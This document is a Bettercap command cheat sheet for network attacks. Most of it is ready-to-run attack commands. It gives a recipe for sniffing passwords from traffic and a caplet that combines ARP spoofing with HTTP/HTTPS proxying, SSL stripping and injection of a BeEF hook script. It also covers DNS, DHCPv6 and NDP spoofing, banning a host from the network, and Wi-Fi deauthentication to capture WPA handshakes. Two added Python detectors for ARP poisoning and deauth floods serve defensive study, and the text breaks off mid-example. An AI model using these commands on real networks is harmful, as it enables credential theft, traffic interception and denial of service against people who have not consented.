The net.recon module performs passive scanning and is on by default, but it may not discover active devices that are not sending ARP messages while Bettercap is running. Bettercap also includes an active scanning feature in the net.probe module. The net.probe module continually sends UDP packets to all hosts on the network, using four common discovery protocols: NetBIOS Name Service (NBNS), Multicast DNS (mDNS), Universal Plug-and-Play (UPnP), and Web Services Discovery (WSD).
turn active host discovery on/off
net.probe on/off
Running the net.probe module for several seconds will typically reveal many more host discoveries than the net.recon module will discover. During the active discovery, or after stopping the discovery, you can examine information about discovered hosts using the net.show command.
Sniffing
turn packet sniffing on/off
net.sniff on/off
set verbose
set net.sniff.verbose true/false
If true it will consider packets from/to this computer, otherwise it will skip them.
set net.sniff.local true/false
save packets to a file
set net.sniff.output [filename]
examine packet sniffer status
net.sniff stats
add source pcap file to read
set net.sniff.source [filename]
extract matching regex from packet payloads
set net.sniff.regexp [regex]
set a protocol filter for sniffer output
set net.sniff.filter not arp
set net.sniff.filter dhcp
Password Sniffing
set net.sniff.local true
set net.sniff.regexp '.*password=.+'
set net.sniff.verbose 'true'
set net.sniff.output "passwords.pcap"
You can use the predefined caplet http-req-dump.cap:
# targeting the whole subnet by default, to make it selective:
#
# sudo ./bettercap -caplet http-req-dump.cap -eval "set arp.spoof.targets 192.168.1.10"
# to make it less verbose
# events.stream off
# discover a few hosts
net.probe on
sleep 1
net.probe off
# uncomment to enable sniffing too
set net.sniff.verbose false
set net.sniff.local true
set net.sniff.filter tcp port 443
net.sniff on
# we'll use this proxy script to dump requests
set https.proxy.script http-req-dump.js
set http.proxy.script http-req-dump.js
clear
# go ^_^
http.proxy on
https.proxy on
arp.spoof on
When the user opens an HTTP website, for instance time.com, the hook will be executed.
Bettercap + BeEF Hook
Fuzzing
In addition to packet-sniffing capabilities, Bettercap also can mutate packets for network protocol fuzzing using the net.fuzz module. By default, the net.fuzz module will mutate 100% of packets transmitted by Bettercap, mutating 40% of the packet payload data. You can adjust these values by changing the net.fuzz.rate and net.fuzz.ratio parameters.
set net.show.meta true
SYN Scan
start SYN scan
syn.scan [ip range] [start port] [end port]
stop scan
syn.scan stop
show progress
syn.scan.progress
show results
net.show
Ticker Commands
The Bettercap ticker allows you to specify a collection of commands to run at a fixed frequency, which is great for monitoring the network or periodically scanning for new network targets.
ticker on/off
set ticker.commands "list; of; commands"
# example:
set ticker.period 10
set ticker.commands "clear; net.show; events.show 20 "
ARP Spoof
start ARP spoof
arp.spoof on/off
# Specify a list of target IP addresses, comma-separated
set arp.spoof.targets [IPs]
run ARP spoof in ban mode (the target's connections won't work)
arp.ban on/off
run full-duplex ARP spoof (both the target and the gateway are spoofed);
if the gateway has ARP spoof protection the attack will fail
set arp.spoof.fullduplex true/false
# example:
# Ban the address 192.168.1.6 from the network:
set arp.spoof.targets 192.168.1.6; arp.ban on
# Spoof 192.168.1.2, 192.168.1.3 and 192.168.1.4
set arp.spoof.targets 192.168.1.2-4; arp.spoof on
Ban Target From Network
set arp.spoof.targets <TARGET_IP>
arp.ban on
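A defender-side counterpart to the arp.spoof, arp.ban and fullduplex commands above, as an added example that is not Bettercap code or part of this page: it replays constructed ARP reply records and flags the two signatures those modes leave behind (an IP whose MAC changes, and one MAC answering for the gateway plus other hosts). The record format and the gateway address are assumptions.

```python
# Added example, not Bettercap code: a minimal ARP-cache-poisoning detector of
# the kind a defender runs to spot arp.spoof / arp.ban activity. Input is a
# constructed list of ARP reply records (time, sender IP, sender MAC); in
# practice they would come from a sniffer, a switch's ARP log or a SIEM feed.
from collections import defaultdict

class ArpMonitor:
    """Tracks which MAC last claimed each IP and reports conflicts."""
    def __init__(self, gateway_ip):
        self.gateway_ip = gateway_ip
        self.bindings = {}                 # ip -> MAC last seen answering for it
        self.claims = defaultdict(set)     # mac -> set of IPs it has answered for
        self.alerts = []
        self._seen = set()                 # dedupe keys so each finding fires once

    def _alert(self, key, msg):
        if key not in self._seen:
            self._seen.add(key)
            self.alerts.append(msg)

    def observe(self, ts, ip, mac):
        mac = mac.lower()
        prev = self.bindings.get(ip)
        if prev is not None and prev != mac:
            # A second MAC answering for an already-bound IP is the core spoof signature.
            self._alert(("move", ip, prev, mac), f"t={ts}: IP {ip} moved from {prev} to {mac}")
        self.bindings[ip] = mac
        self.claims[mac].add(ip)
        # One MAC answering for the gateway *and* other hosts matches full-duplex spoofing.
        others = self.claims[mac] - {self.gateway_ip}
        if self.gateway_ip in self.claims[mac] and others:
            self._alert(("gateway", mac),
                        f"t={ts}: MAC {mac} answers for gateway {self.gateway_ip} and {sorted(others)}")
        return self.alerts

# Constructed sample, not captured traffic: host cc:..:50 starts answering for
# both the gateway (192.168.1.1) and the victim (192.168.1.2) at t=5.
SAMPLE = [
    (0, "192.168.1.1", "aa:aa:aa:aa:aa:01"),
    (1, "192.168.1.2", "bb:bb:bb:bb:bb:02"),
    (2, "192.168.1.50", "cc:cc:cc:cc:cc:50"),
    (5, "192.168.1.1", "cc:cc:cc:cc:cc:50"),
    (5, "192.168.1.2", "cc:cc:cc:cc:cc:50"),
]

def detect(records, gateway_ip="192.168.1.1"):
    """Run every record through an ArpMonitor and return the alert list."""
    mon = ArpMonitor(gateway_ip)
    for ts, ip, mac in records:
        mon.observe(ts, ip, mac)
    return mon.alerts
```

Running detect(SAMPLE) yields three alerts: the gateway IP moving to cc:..:50, that MAC answering for the gateway as well as its own address, and the victim IP moving to the same MAC.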
DNS Spoof
Set the dns.spoof.address for the host that you want to receive client activity stemming from spoofed responses. Set dns.spoof.domains to a comma-separated list of all the domains you want to target for DNS spoofing, or set dns.spoof.all to true to spoof all DNS responses. Alternatively, you can target your attack by setting dns.spoof.hosts to a hosts file that uses a specific hostname-to-IP-address pairing (using the same configuration of the standard /etc/hosts file on UNIX systems).
dns.spoof on/off
Set the IP address to return for spoofed DNS answers
set dns.spoof.address [address]
Set the domain targets for DNS spoofing as a comma-separated list
set dns.spoof.domains [domain]
Perform DNS spoofing for all requests regardless of domain list or hosts file
set dns.spoof.all true/false
Perform DNS spoofing only for the entries mapped in the specified hosts file
set dns.spoof.hosts [hostsfile]
DHCPv6 Spoof
dhcp6.spoof on/off
NDP Spoof
ndp.spoof on/off
Custom Proxy
turn any proxy on/off
any.proxy on/off
# set interface for redirection
set any.proxy.iface <interface name>
# set protocol
set any.proxy.protocol TCP/UDP
# set port
set any.proxy.src_port 80
# set source address
set any.proxy.src_address [ip]
# set dest address
set any.proxy.dst_address [ip]
# set dst port
set any.proxy.dst_port [port]
TCP Proxy
tcp.proxy on/off
HTTP Proxy
http.proxy on/off
enable SSL strip attack
set http.proxy.sslstrip true/false
URL, path or js code to inject into every HTML page
http.proxy.injectjs
set http.proxy.script /root/Desktop/Hook.js
# example:
# Will ARP spoof the whole network,
# enable sslstrip and inject a
# "Hello World" javascript alert
# to every HTML page being visited:
set http.proxy.injectjs alert("Hello World")
set http.proxy.sslstrip true
http.proxy on
arp.spoof on
HTTPS Proxy
A full featured HTTPS transparent proxy that can be scripted using javascript modules. If used together with a spoofer, all HTTPS traffic will be redirected to it and it will automatically handle port redirections as needed.
When a new TLS connection is being proxied, bettercap will fetch the original certificate from the target host and re-sign the full chain on the fly using its own CA.
https.proxy on/off
enable SSL strip attack
set https.proxy.sslstrip true/false
inject js code
https.proxy.injectjs
set https.proxy.script /root/Desktop/Hook.js
Wifi Network Monitoring
wifi.recon covers both the 2.4 GHz and 5 GHz bands and does everything you need here: deauth, sniffing and handshake capture. To start, add the -iface option:
bettercap -iface wlan0
If you get the error "Can't restore interface wlan0 wireless mode (SIOCSIWMODE failed: Bad file descriptor). Please adjust manually.", quit bettercap and set the wireless interface to monitor mode manually, for example:
$ sudo ip link set wlan0 down
$ sudo iw wlan0 set monitor control
$ sudo ip link set wlan0 up
Turn on recon:
wifi.recon on
You can manage channels with:
wifi.recon.channel 10,11
To clear them:
wifi.recon.channel clear
Results can be seen with:
wifi.show
To capture handshakes, define a sniffer, filter for EAPOL frames (ether proto 0x888e), set the output file for processing later on, and optionally select the channel and/or target:
set net.sniff.verbose true
set net.sniff.filter ether proto 0x888e
set net.sniff.output /root/wpa.pcap
net.sniff on
wifi.recon.channel 1
wifi.recon on
wifi.recon 94:33:30:a6:2b:63
Then we should hit it with the Deauth. You can deauth all clients with:
wifi.deauth AP-BSSID
or just specific one:
wifi.deauth CLIENT-BSSID
Once you have captured a handshake, you can start cracking it. We'll not cover that here.
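The wifi.deauth commands above produce bursts of 802.11 deauthentication frames, which is what a wireless IDS keys on. As an added example that is not Bettercap code or part of this page, the following parses raw 802.11 management headers (radiotap already stripped, an assumption) and flags any BSSID sending more than a threshold of deauths within a sliding window; the frames are constructed inline and the AP addresses are made up.

```python
# Added example, not Bettercap code: a defender-side detector for the
# deauthentication bursts that wifi.deauth produces. It parses raw 802.11
# management headers (radiotap stripped) and counts deauth frames per BSSID
# in a sliding time window. All frames below are constructed inline.
import struct
from collections import defaultdict

MGMT, DEAUTH, BEACON = 0, 12, 8   # 802.11 frame type / subtype values

def parse_mgmt_header(frame):
    """Return (type, subtype, addr1, addr2, bssid) or None if too short."""
    if len(frame) < 24:
        return None
    fc = struct.unpack_from("<H", frame, 0)[0]      # frame control, little-endian
    mac = lambda b: ":".join(f"{x:02x}" for x in b)
    return (fc >> 2) & 0x3, (fc >> 4) & 0xF, mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22])

def build_frame(subtype, dst, src, bssid, body=b""):
    """Constructed management frame: FC, duration, addr1..3, sequence control, body."""
    macs = b"".join(bytes.fromhex(m.replace(":", "")) for m in (dst, src, bssid))
    return struct.pack("<HH", (MGMT << 2) | (subtype << 4), 0) + macs + struct.pack("<H", 0) + body

def deauth_bursts(frames, window=1.0, threshold=5):
    """frames: iterable of (timestamp, raw bytes). Returns {bssid: peak count} for
    BSSIDs that sent more than `threshold` deauths within any `window` seconds."""
    times = defaultdict(list)
    for ts, raw in frames:
        hdr = parse_mgmt_header(raw)
        if hdr and hdr[0] == MGMT and hdr[1] == DEAUTH:
            times[hdr[4]].append(ts)
    flagged = {}
    for bssid, tss in times.items():
        tss.sort()
        start = 0
        for end in range(len(tss)):
            while tss[end] - tss[start] > window:     # shrink window from the left
                start += 1
            if end - start + 1 > threshold:
                flagged[bssid] = max(flagged.get(bssid, 0), end - start + 1)
    return flagged

def run_sample():
    """Constructed capture: 8 deauths in 0.7 s from AP 02:..:01 (a flood), plus a
    beacon and one lone deauth from AP 02:..:02 (ordinary traffic, not flagged)."""
    ap1, ap2, bcast = "02:00:00:00:00:01", "02:00:00:00:00:02", "ff:ff:ff:ff:ff:ff"
    reason = struct.pack("<H", 7)                     # deauth body: reason code 7
    frames = [(0.1 * i, build_frame(DEAUTH, bcast, ap1, ap1, reason)) for i in range(8)]
    frames.append((0.2, build_frame(BEACON, bcast, ap1, ap1)))
    frames.append((3.0, build_frame(DEAUTH, bcast, ap2, ap2, reason)))
    return deauth_bursts(frames)
```

run_sample() returns only the flooding AP with its peak in-window count; the single deauth from the second AP stays below the threshold, which is the behaviour to tune against normal roaming on a real network.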
BLE (Bluetooth Low Energy device discovery)
ble.recon discovers every BLE device in range; you can then inspect a device with ble.enum or write to it with ble.write.
To connect, enumerate and read characteristics from the BLE device 04:ff:de:ff:be:ff:
ble.enum 04:ff:de:ff:be:ff
Write the bytes ff ff ff ff ff ff ff ff to the BLE device 04:ff:de:ff:be:ff on its characteristics with UUID 234afbd5e3b34536a3fe72f630d4278d: